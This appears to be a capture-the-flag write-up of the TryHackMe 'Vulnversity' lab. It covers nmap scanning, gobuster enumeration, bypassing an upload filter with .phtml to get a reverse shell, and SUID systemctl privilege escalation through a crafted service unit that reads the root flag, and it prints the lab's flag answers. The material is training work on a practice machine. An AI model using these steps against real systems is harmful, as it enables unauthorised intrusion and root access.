✅Scan the box; how many ports are open?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# nmap -p- --open --max-retries 1 --min-rate 3000 10.10.178.151 -Pn
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-09-12 21:48 KST
Nmap scan report for 10.10.178.151
Host is up (0.29s latency).
Not shown: 65391 closed tcp ports (reset), 138 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3128/tcp open squid-http
3333/tcp open dec-notes
Nmap done: 1 IP address (1 host up) scanned in 24.65 seconds
Answer : 6
✅What version of the squid proxy is running on the machine?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# nmap -sV -sC -Pn -p 3128 10.10.178.151
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-09-12 21:50 KST
Nmap scan report for 10.10.178.151
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.12
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.80 seconds
Answer : 3.5.12
✅How many ports will Nmap scan if the flag -p-400 was used?
Answer : 400
✅What is the most likely operating system this machine is running?
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/12%OT=21%CT=1%CU=32395%PV=Y%DS=5%DC=I%G=Y%TM=66E2
OS:E410%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)
OS:SEQ(SP=106%GCD=1%ISR=10F%TI=Z%TS=8)SEQ(SP=106%GCD=1%ISR=10F%TI=Z%II=I%TS
OS:=8)SEQ(SP=106%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)OPS(O1=M508ST11NW7%O2=M5
OS:08ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(
OS:W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903
OS:%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 5 hops
OS detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 19.46 seconds
Answer : Ubuntu
✅What port is the web server running on?
Answer : 3333
✅It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).
Answer : YES
✅What is the flag for enabling verbose mode using Nmap?
Answer : -V
✅I have successfully configured Gobuster.
Answer : YES
✅What is the directory that has an upload form page?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# gobuster dir -k -w /usr/share/dirb/wordlists/common.txt -u <http://10.10.178.151:3333/>
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://10.10.178.151:3333/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 294]
/.htaccess (Status: 403) [Size: 299]
/.htpasswd (Status: 403) [Size: 299]
/css (Status: 301) [Size: 319] [--> <http://10.10.178.151:3333/css/>]
/fonts (Status: 301) [Size: 321] [--> <http://10.10.178.151:3333/fonts/>]
/images (Status: 301) [Size: 322] [--> <http://10.10.178.151:3333/images/>]
/index.html (Status: 200) [Size: 33014]
/internal (Status: 301) [Size: 324] [--> <http://10.10.178.151:3333/internal/>]
/js (Status: 301) [Size: 318] [--> <http://10.10.178.151:3333/js/>]
Answer : /internal/
✅What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
Answer : .php
✅I understand the Burpsuite tool and its purpose during pentesting.
Answer : YES
✅What extension is allowed after running the above exercise?
Answer : .phtml
✅While completing the above exercise, I have successfully downloaded the PHP reverse shell.
파일이 업로드 된 경로 확인 및 실행
리버스쉘 연결을 위해 소프트웨어 존재 여부 확인
revshell에서 얻은 파이썬3 리버스쉘 스크립트로 초기침투 성공
Answer : YES
✅What is the name of the user who manages the webserver?
www-data@vulnuniversity:/home$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Jul 31 2019 .
drwxr-xr-x 23 root root 4096 Jul 31 2019 ..
drwxr-xr-x 2 bill bill 4096 Jul 31 2019 bill
Answer : bill
✅What is the user flag?
www-data@vulnuniversity:/home$ cd bill
www-data@vulnuniversity:/home/bill$ ls -la
total 24
drwxr-xr-x 2 bill bill 4096 Jul 31 2019 .
drwxr-xr-x 3 root root 4096 Jul 31 2019 ..
-rw-r--r-- 1 bill bill 220 Jul 31 2019 .bash_logout
-rw-r--r-- 1 bill bill 3771 Jul 31 2019 .bashrc
-rw-r--r-- 1 bill bill 655 Jul 31 2019 .profile
-rw-r--r-- 1 bill bill 33 Jul 31 2019 user.txt
www-data@vulnuniversity:/home/bill$ cat user.txt
8bd7992fbe8a6ad22a63361004cfcedb
Answer : 8bd7992fbe8a6ad22a63361004cfcedb
✅On the system, search for all SUID files. Which file stands out?
www-data@vulnuniversity:/home/bill$ find / -type f -perm -4000 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
Answer : /bin/systemctl
✅What is the root flag value?
www-data@vulnuniversity:/home/bill$ cd /bin
www-data@vulnuniversity:/bin$ TF=$(mktemp).service
www-data@vulnuniversity:/bin$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/bin$ ./systemctl link $TF
Created symlink from /etc/systemd/system/tmp.emh8H8dSWF.service to /tmp/tmp.emh8H8dSWF.service.
www-data@vulnuniversity:/bin$ ./systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.emh8H8dSWF.service to /tmp/tmp.emh8H8dSWF.service.
www-data@vulnuniversity:/bin$ cat /tmp/output
a58ff8579f0a9270368d33a9966c7fd5
Answer : a58ff8579f0a9270368d33a9966c7fd5
[TryHackMe] Daily Bugle (2) | 2024.09.26 |
---|---|
[TryHackMe] Skynet (2) | 2024.09.26 |
[TryHackMe] Game Zone (1) | 2024.09.25 |
[TryHackMe] HackPark (0) | 2024.09.25 |
[TryHackMe] Alfred (3) | 2024.09.25 |